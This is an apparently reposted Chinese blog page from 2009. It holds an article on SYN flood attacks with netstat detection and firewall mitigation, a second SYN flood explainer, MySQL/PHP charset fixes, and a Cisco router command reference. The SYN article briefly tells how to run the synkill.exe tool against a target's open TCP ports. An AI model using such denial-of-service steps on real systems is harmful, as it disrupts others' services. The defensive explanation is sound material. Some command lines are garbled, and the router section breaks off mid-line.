　　SYN攻击属于DOS攻击的一种，它利用TCP协议缺陷，通过发送大量的半连接请求，耗费CPU和内存资源。SYN攻击除了能影响主机外，还可以危害路由器、防火墙等网络系统，事实上SYN攻击并不管目标是什么系统，只要这些系统打开TCP服务就可以实施。从上图可看到，服务器接收到连接请求（syn=j），将此信息加入未连接队列，并发送请求包给客户（syn=k,ack=j+1），此时进入SYN_RECV状态。当服务器未收到客户端的确认包时，重发请求包，一直到超时，才将此条目从未连接队列删除。配合IP欺骗，SYN攻击能达到很好的效果，通常，客户端在短时间内伪造大量不存在的IP地址，向服务器不断地发送syn包，服务器回复确认包，并等待客户的确认，由于源地址是不存在的，服务器需要不断的重发直至超时，这些伪造的SYN包将长时间占用未连接队列，正常的SYN请求被丢弃，目标系统运行缓慢，严重者引起网络堵塞甚至系统瘫痪。

三、SYN攻击工具　　SYN攻击实现起来非常的简单，互联网上有大量现成的SYN攻击工具。
　　1、Windows系统下的SYN工具
　　以synkill.exe为例，运行工具，选择随机的源地址和源端囗，并填写目标机器地址和TCP端囗，激活运行，很快就会发现目标系统运行缓慢。如果攻击效果不明显，可能是目标机器并未开启所填写的TCP端囗或者防火墙拒绝访问该端囗，此时可选择允许访问的TCP端囗，通常，windows系统开放tcp139端囗，UNIX系统开放tcp7、21、23等端囗。
　　四、检测SYN攻击
　　检测SYN攻击非常的方便，当你在服务器上看到大量的半连接状态时，特别是源IP地址是随机的，基本上可以断定这是一次SYN攻击。我们使用系统自带的netstat 工具来检测SYN攻击：
# netstat -n -p TCP

tcp　0　 0 10.11.11.11:23124.173.152.8:25882　 SYN_RECV　-

tcp　0　 0 10.11.11.11:23236.15.133.204:2577　 SYN_RECV　-

tcp　0　 0 10.11.11.11:23127.160.6.129:51748　 SYN_RECV　-

tcp　0　 0 10.11.11.11:23222.220.13.25:47393　 SYN_RECV　-

tcp　0　 0 10.11.11.11:23212.200.204.182:60427 SYN_RECV　-

tcp　0　 0 10.11.11.11:23232.115.18.38:278 SYN_RECV　-

tcp　0　 0 10.11.11.11:23239.116.95.96:5122SYN_RECV　-

tcp　0　 0 10.11.11.11:23236.219.139.207:49162 SYN_RECV　-

...
上面是在LINUX系统中看到的，很多连接处于SYN_RECV状态（在WINDOWS系统中是SYN_RECEIVED状态），源IP地址都是随机的，表明这是一种带有IP欺骗的SYN攻击。
　　我们也可以通过下面的命令直接查看在LINUX环境下某个端囗的未连接队列的条目数：
＃netstat -n -p TCP 　 grep SYN_RECV 　 grep :22 　 wc -l 324
　　显示TCP端囗22的未连接数有324个，虽然还远达不到系统极限，但应该引起管理员的注意。
　　五、SYN攻击防范技术
　　关于SYN攻击防范技术，人们研究得比较早。归纳起来，主要有两大类，一类是通过防火墙、路由器等过滤网关防护，另一类是通过加固TCP/IP协议栈防范.但必须清楚的是，SYN攻击不能完全被阻止，我们所做的是尽可能的减轻SYN攻击的危害，除非将TCP协议重新设计。
　　1、过滤网关防护
　　这里，过滤网关主要指明防火墙，当然路由器也能成为过滤网关。防火墙部署在不同网络之间，防范外来非法攻击和防止保密信息外泄，它处于客户端和服务器之间，利用它来防护SYN攻击能起到很好的效果。过滤网关防护主要包括超时设置，SYN网关和SYN代理三种。
　　■网关超时设置：
　　防火墙设置SYN转发超时参数（状态检测的防火墙可在状态表里面设置），该参数远小于服务器的timeout时间。当客户端发送完SYN包，服务端发送确认包后（SYN＋ACK），防火墙如果在计数器到期时还未收到客户端的确认包（ACK），则往服务器发送RST包，以使服务器从队列中删去该半连接。值得注意的是，网关超时参数设置不宜过小也不宜过大，超时参数设置过小会影响正常的通讯，设置太大，又会影响防范SYN攻击的效果，必须根据所处的网络应用环境来设置此参数。
　　■SYN网关：
　　SYN网关收到客户端的SYN包时，直接转发给服务器；SYN网关收到服务器的SYN/ACK包后，将该包转发给客户端，同时以客户端的名义给服务器发ACK确认包。此时服务器由半连接状态进入连接状态。当客户端确认包到达时，如果有数据则转发，否则丢弃。事实上，服务器除了维持半连接队列外，还要有一个连接队列，如果发生SYN攻击时，将使连接队列数目增加，但一般服务器所能承受的连接数量比半连接数量大得多，所以这种方法能有效地减轻对服务器的攻击。

[转]深入理解SYN攻击.+防范思想及ROS设置

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:44:10 GMT

SYN洪水攻击是DOS(这个DOS不是操作系统.别搞混了)和DDOS的一种.也就是拒绝服务和分布式拒绝服务攻击
首先我们来看这种攻击的原理.要想明白这种原理.还得先知道TCP连接建立的过程
TCP与UDP不同,它是基于连接的,也就是说:为了在服务端和客户端之间传送TCP数据,必须先建立一个虚拟电
路,也就是TCP连接,标准过程是这样的：
首先,客户端发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口
以及TCP连接的初始序号;
第二步,服务器在收到客户端的SYN报文后,将返回一个SYN+ACK的报文,表示客户端的请求被接受,同时TCP序
号被加一,ACK即确认(Acknowledgement).
第三步,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加一,到此一个TCP连接完成.
这个过程被称为三次握手(Three-way Handshake)
而SYN攻击的问题就出在了第三步:客户端不返回确认报文给服务器~这种情况下服务器端一般会重试(再次
发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接--(SYN半连接攻击)
而如果大量的这种半连接出现.服务器就会有大量的资源被消耗在了重试发送SYN+ACK给客户端上.而没有资
源来处理正常的连接请求了.
因此.碰到这种攻击.可以查看路由器状态的.就会发现路由器CPU使用率相当高~!
让我们再深入理解一下
TCP的报文格式是这样的
IP首部--TCP首部--TCP数据段
IP首部就是IP地址.SYN攻击软件或者是病毒.会在这里写入随机的IP
举个例子.更形象的理解:
你的网吧.内部机器的IP地址是192.168.0.1-254.如果这个软件(病毒)在IP首部写的是192.168.0.23 而这个IP正好有人在使用.服务器发SYN+ACK报文后.它会返回通知服务器不需要等待这个空连接.
但是如果写入的IP是75.12.23.9呢?你网吧内有这个IP吗?没有.那么服务器就会重试并等待这个过程了.因为没有任何机器会通知服务器这个连接是无效的.这正是TCP/IP协议的缺陷所在
到了这里.我们可以很遗憾的明白.对付这类攻击.目前没有很好的防御方法.这种基于TCP/IP协议缺陷所做出的攻击.只要是你用TCP/IP协议.就会有可能受到攻击的.-_-!

[转]File ‘c:\mysql\share\charsets\?.conf’ 两种解决办法

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:42:38 GMT

File ‘c:\mysql\share\charsets\?.conf’ not found (Errcode: 22) Character set ‘#33′
is not a compiled character set and is not specified in the ‘c:\mysql\share\charsets\Index’ file

只要简单的打开PHP.ini 将 output_buffering = Off 改为 output_buffering = On然后重新启动IIS就OK了..呵呵..

如果还是不行的话..用第二种方法:

“在Mysql的官方网站上看有人说，错误提示信息不是说要找那个目录的某个文件吗，那就去建立一个目录”!

解決:下载压缩包,,解压以后把mysql这个文件夹放在C盘根目录就行了!

[转]mysql+php产生乱码原因

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:41:25 GMT

mysql+php产生乱码原因:
mysql数据库默认的编码是utf8,如果这种编码与你的PHP网页不一致,可能就会造成MYSQL乱码. MYSQL中创建表时会让你选择一种编码,如果这种编码与你的网页编码不一致,也可能造成MYSQL乱码. MYSQL创建表时添加字段是可以选择编码的,如果这种编码与你的网页编码不一致,也可能造成MYSQL乱码. 用户提交页面的编码与显示数据的页面编码不一致,就肯定会造成PHP页面乱码. 如用户输入资料的页面是big5码, 显示用户输入的页面却是gb2312,这种100%会造成PHP页面乱码. PHP页面字符集不正确. PHP连接MYSQL数据库语句指定的编码不正确. 注意:
很多人都怀疑mysql版本不一致会导致乱码,相信看了本说明你就不会这样认为了.
平时你在某些网站看到的文字可能有几种编码, 如你看到一个繁体字,它有可能是big5编码,也有可能是utf-8编码的,更有可能是gb码的,没错,也就是说有简体编码的繁体字,也有繁体编码的简体字,一定要了解这一点.
如果你是做一个简体编码的网页,编码定为GB2312,如果有香港和台湾地区的访客提交繁体的信息,就可能会造成乱码,解决方法:
将网站编码设为 utf-8,这样可以兼容世界上所有字符, 如果网站已经运作了好久,已有很多旧数据,不能再更改简体中文的设定,那么建议将页面的编码设为 GBK, GBK与GB2312的区别就在于:GBK能比GB2312显示更多的字符,要显示简体码的繁体字,就只能用GBK.

使用mysql+php产生乱码的原因都了解得很清楚了,那么解决就不困难了.

mysql+php产生乱码的解决办法:

如果安装mysql的编码已不能更改,很多朋友是购买虚拟主机建立网站,无权更改MYSQL的安装编码,这一关我们可以跳过,因为只要后面的步聚正确,一样能解决乱码问题修改数据库编码，如果是数据库编码不正确,可以在phpmyadmin 执行如下命令:

ALTER DATABASE 'test' DEFAULT CHARACTER SET utf8 COLLATE utf8_bin

以上命令就是将test数据库的编码设为utf8.
修改表的编码：

ALTER TABLE 'category' DEFAULT CHARACTER SET utf8 COLLATE utf8_bin

以上命令就是将一个表category的编码改为utf8.
修改字段的编码：

ALTER TABLE 'test' CHANGE 'dd' 'dd' VARCHAR( 45 ) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL

以上命令就是将test表中 dd的字段编码改为utf8.
如果是这种情况容易解决，只需检查下页面，修改源文件的charset即可. 这种情况也是修改页面charset即可. 在连接数据库的语句中. mysql_connect('localhost','user','password');
mysql_select_db('my_db');
mysql_query("set names utf8;"); //select 数据库之后加多这一句

为了避免PHP页面乱码的发生，PHP页面开始第一句
header("content-type:text/html; charset=utf-8");
//强行指定页面的编码，以避免乱码

[转]路由器配置命令大全

81436561@qq.com(李洪) — Sun, 11 Oct 2009 13:40:52 GMT

Sample TextSample TextCisco
1 特权模式命令:
<1-99> 恢复一个会话
bfe 手工应急模式设置
clear 复位功能
clock 管理系统时钟
configure 进入设置模式
connect 打开一个终端
copy 从tftp服务器拷贝设置文件或把设置文件拷贝到tftp服务器上
debug 调试功能
disable 退出优先命令状态
disconnect 断开一个网络连接
enable 进入优先命令状态
erase 擦除快闪内存
exit 退出exce模式
help 交互帮助系统的描述
lat 打开一个本地传输连接
lock 锁定终端
login 以一个用户名登录
logout 退出终端
mbranch 向树形下端分支跟踪多路由广播
mrbranch 向树形上端分支跟踪反向多路由广播
name-connection 给一个存在的网络连接命名
no 关闭调试功能
pad 打开X.29 PAD连接
ping 发送回显信息
ppp 开始点到点的连接协议
reload 停机并执行冷启动
resume 恢复一个活动的网络连接
rlogin 打开远程注册连接
rsh 执行一个远端命令
send 发送信息到另外的终端行
setup 运行setup命令
show 显示正在运行系统信息
slip 开始SLIP协议
start-chat 在命令行上执行对话描述
systat 显示终端行的信息
telnet 远程登录
terminal 终端行参数
test 测试子系统内存和端口
tn3270 打开一个tin3270连接
trace 跟踪路由到目的地
undebug 退出调试功能
verify 验证检查闪烁文件的总数
where 显示活动的连接
which-route 执行OSI路由表查找并显示结果
write 把正在运行的设置写入内存、网络、或终端
x3 在PAD上设置X.3参数
xremote 进入xremote模式
2 #show ?
access-expression 显示访问控制表达式
access-lists 显示访问控制表
apollo Apollo 网络信息
appletalk Apple Talk 信息
arap 显示Appletalk 远端通道统计
arp 地址解析协议表
async 访问路由接口的终端行上的信息
bridge 前向网络数据库
buffers 缓冲池统计
clns CLNS网络信息
clock 显示系统时钟
cmns 连接模式网络服务信息
compress 显示压缩状态
configuration 非易失性内存的内容
controllers 端口控制状态
debugging 调试选项状态
decnet DEC网络信息
dialer 拨号参数和统计
dnsix 显示Dnsix/DMPP信息
entry 排队终端入口
extended 扩展端口信息
flash 系统闪烁信息
flh-log 闪烁装载帮助日志缓冲区
frame-relay 帧中继信息
history 显示对话层历史命令
hosts IP域名，查找方式，名字服务，主机表
interfaces 端口状态和设置
ip IP信息
ipx Novell IPX信息
isis IS-IS路由信息
keymap 终端键盘映射
lat DEC LAT信息
line 终端行信息
llc2 IBM LLC2 环路信息
lnm IBM 局网管理
local-ack 本地认知虚环路
memory 内存统计
netbios-cache NetBios命名缓冲存贮器内存
node 显示已知LAT节点
ntp 网络时间协议
processes 活动进程统计
protocols 活动网络路由协议
queue 显示队列内容
queueing 显示队列设置
registry 功能注册信息
rhosts 远程主机文件
rif RIF存贮器入口
route-map 路由器信息
sdlle 显示sdlc-llc2转换信息
services 已知LAT服务
sessions 远程连接信息
smds SMDS信息
source-bridge 源网桥参数和统计
spanning-tree 跨越树形拓朴
stacks 进程堆栈应用
standby 热支持协议信息
stun STUN状态和设置
subsystem 显示子系统
tcp TCP连接状态
terminal 显示终端设置
tn3270 TN3270 设置
translate 协议转换信息
ttycap 终端容易表
users 显示终端行的信息
version 系统硬、软件状态
vines VINES信息
whoami 当前终端行信息
x25 X.25信息
xns XNS信息
xermote Xremote统计
3 #config ?
Memory 从非易失性内存设置
Network 从TFTP网络主机设置
Overwrite-network 从TFTP网络主机设置覆盖非易失性内存
Terminal 从终端设置
4 全局配置模式命令
Access-list 增加一个访问控制域
Apollo Apollo全局设置命令
appletalk Appletalk 全局设置命令
arap Appletalk远程进出协议
arp 设置一个静态ARP入口
async-bootp 修改系统启动参数
autonomous-system 本地所拥有的特殊自治系统成员
banner 定义注册显示信息
boot 修改系统启动时参数
bridge 透明网桥
buffers 调整系统缓冲池参数
busy-message 定义当连接主机失败时显示信息
chat-s cript 定义一个调制解调器对话文本
clns 全局CLNS设置子命令
clock 设置时间时钟
config-register 定义设置寄存器
decnet 全局DEC网络设置子命令
default-value 缺省字符位值
dialer-list 创建一个拨号清单入口
dnsix-nat 为审计提供DMDM服务
enable 修改优先命令口令
end 从设置模式退出
exit 从设置模式退出
frame-relay 全局帧中继设置命令
help 交互帮助系统的描述
hostname 设置系统网络名
iterface 选择设置的端口
ip 全局地址设置子命令
ipx Novell/IPX全局设置命令
keymap 定义一个新的键盘映射
lat DEC本地传输协议
line 设置终端行
lnm IBM局网管理
locaddr-priority-list 在LU地址上建立优先队列
logging 修改注册（设备）信息
login-string 定义主机指定的注册字符串
map-class 设置静态表类
map-list 设置静态表清单
menu 定义用户接口菜单
mop 设置DEC MOP服务器
netbios NETBIOS通道控制过滤
no 否定一个命令或改为缺省设置
ntp 设置NTP
priority-list 建立特权列表
prompt 设置系统提示符
queue-list 建立常规队列列表
rcmd 远程命令设置命令
rcp-enable 打开Rep服务
rif 源路由进程
router-map 建立路由表或进入路由表命令模式
router 打开一个路由进程
rsh-enable 打开一个RSH服务
sap-priority-list 在SAP或MAC地址上建立一个优先队列
service 修改网络基本服务
snmp-server 修改SNMP参数
state-machine 定义一个TCP分配状态的机器
stun STUN全局设置命令
tacacs-server 修改TACACS队列参数
terminal-queue 终端队列命令
tftp-server 为网络装载请求提供TFTP服务
tn3270 tn3270设置命令
translate 解释全局设置命令
username 建立一个用户名及其权限
vines VINES全局设置命令
x25 X.25 的第三级
x29 X.29 命令
xns XNS 全局设置命令
xremote 设置Xremote
5 全局IP配置子命令
Accounting-list 选择保存IP记帐信息的主机
Accounting-threshold 设置记帐入口的最大数
accounting-transits 设置通过入口的最大数
alias TCP端口的IP地址取别名
as-path BGP自治系统路径过滤
cache-invalidate-delay 延迟IP路由存贮池的无效
classless 跟随无类前向路由规则
default-network 标志网络作为缺省网关候选
default-gateway 指定缺省网（如果没有路由IP）
domain-list 完成无资格主机的域名
domain-lookup 打开IP域名服务系统主机转换
domain-name 定义缺省域名
forward-protocol 控制前向的、物理的、直接的IP广播
host 为IP主机表增加一个入口
host-routing 打开基于主机的路由（代理ARP和再定向）
hp-host 打开HP代理探测服务
mobile-host 移动主机数据库
multicast-routing 打开前向IP
name-server 指定所用名字服务器的地址
ospf-name-lookup 把OSPF路由作为DNS名显示
pim PIM 全局命令
route 建立静态路由
routing 打开IP路由
security 指定系统安全信息
source-route 根据源路由头的选择处理包
subnet-zero 允许子网0子网
tcp 全局TCP参数
6．配置实例
Cisco2501有一个以太网口（AUI）、一个Console口（RJ45）、一个AUX口（RJ45）和两个同步串口，支持DTE和DCE设备，支持 EIA/TIA-232、 EIA/TIA-449、 V.35 、X.25和EIA-530接口。
　（1）配置以太网端口
　　# conf t（从终端配置路由器）
　　# int e0（指定E0口）
　　# ip addr ABCD XXXX（ABCD 为以太网地址，XXXX为子网掩码）
　　# ip addr ABCD XXXX secondary（E0口同时支持两个地址类型。如果第一个为 A类地址，则第二个为B或C类地址）
　　# no shutdown（激活E0口）
　　# exit
　　完成以上配置后，用ping命令检查E0口是否正常。如果不正常，一般是因为没有激活该端口，初学者往往容易忽视。用no shutdown命令激活E0口即可。
　（2）X.25的配置
　　# conf t
　　# int S0（指定S0口）
　　# ip addr ABCD XXXX（ABCD 为以太网S0 的IP地址，XXXX为子网掩码）
　　# encap X25-ABC（封装X.25协议。ABC指定X.25为DTE或DCE操作，缺省为DTE）
　　# x25 addr ABCD（ABCD为S0的X.25端口地址，由邮电局提供）
　　# x25 map ip ABCD XXXX br（映射的X.25地址。ABCD为对方路由器（如：S0）的IP 地址，XXXX为对方路由器（如：S0）的X.25端口地址）
　　# x25 htc X（配置最高双向通道数。X的取值范围1-4095，要根据邮电局实际提供的数字配置）
　　# x25 nvc X（配置虚电路数，X不可超过邮电局实际提供的数否则将影响数据的正常传输）
　　# exit
　　S0端口配置完成后，用no shutdown命令激活E0口。如果ping S0端口正常，ping 映射的X.25 IP地址即对方路由器端口IP地址不通，则可能是以下几种情况引起的：1）本机X.25地址配置错误，重新与邮局核对（X.25地址长度为13位）；2）本机映射IP地址或X.25地址配置错误，重新配置正确；3）对方IP地址或X.25地址配置错误；4）本机或对方路由配置错误。
　（3）专线的配置
　　# conf t
　　# int　S2（指定S2口）
　　# ip addr ABCD XXXX（ABCD 为S2 的IP地址，XXXX为子网掩码）
　　# exit
　　专线口配置完成后，用no shutdown命令激活S2口即可。
　（4）帧中继的配置
　　# conf t
　　# int s0
　　# ip addr ABCD XXXX （ABCD 为S0 的IP地址,XXXX为子网掩码）
　　# encap frante_relay （封装frante_relay 协议）
　　# no nrzi_encoding （NRZI=NO）
　　# frame_relay lmi_type q933a （LMI使用Q933A标准．LMI（Local management Interface）有3种：ANSI：T1.617、CCITTY：Q933A和Cisco特有的标准）
　　# fram-relay intf-typ ABC（ABC为帧中继设备类型，它们分别是DTE设备、DCE交换机或NNI（网络接点接口）支持）
　　# frame_relay interface_dlci 110 br（配置DLCI（数据链路连接标识符））
　　# frame-relay map ip ABCD XXXX broadcast （建立帧中继映射。ABCD为对方IP地址，XXXX为本地DLCI号，broadcast允许广播向前转发或更新路由）
　　# no shutdown （激活本端口）
　　# exit
　　帧中继S0端口配置完成后，用ping命令检查S0口。如果不正常，通常是因为没有激活该端口，用no shutdown命令激活S0口即可。如果ping S0端口正常，ping 映射的IP地址不正常，则可能是帧中继交换机或对方配置错误，需要综合排查。
　（5）配置同步/异步口（适用于2522）
　　# conf t
　　# int s2
　　# ph asyn （配置S2为异步口）
　　# ph sync （配置S2为同步口）
　（6）动态路由的配置
　　# conf t
　　# router eigrp 20 （使用EIGRP路由协议。常用的路由协议有RIP、IGRP、IS-IS等）
　　# passive-interface serial0 （若S0与X.25相连，则输入本条指令）
　　# passive-interface serial1 （若S1与X.25相连，则输入本条指令）
　　# network ABCD （ABCD为本机的以太网地址）
　　# network XXXX （XXXX为S0的IP地址）
　　# no auto-summary
　　# exit
　（7）静态路由的配置
　　# ip router ABCD XXXX YYYY 90 （ABCD为对方路由器的以太网地址，XXXX 为子网掩码，YYYY为对方对应的广域网端口地址）
　　# dialer-list 1 protocol ip permailSample Text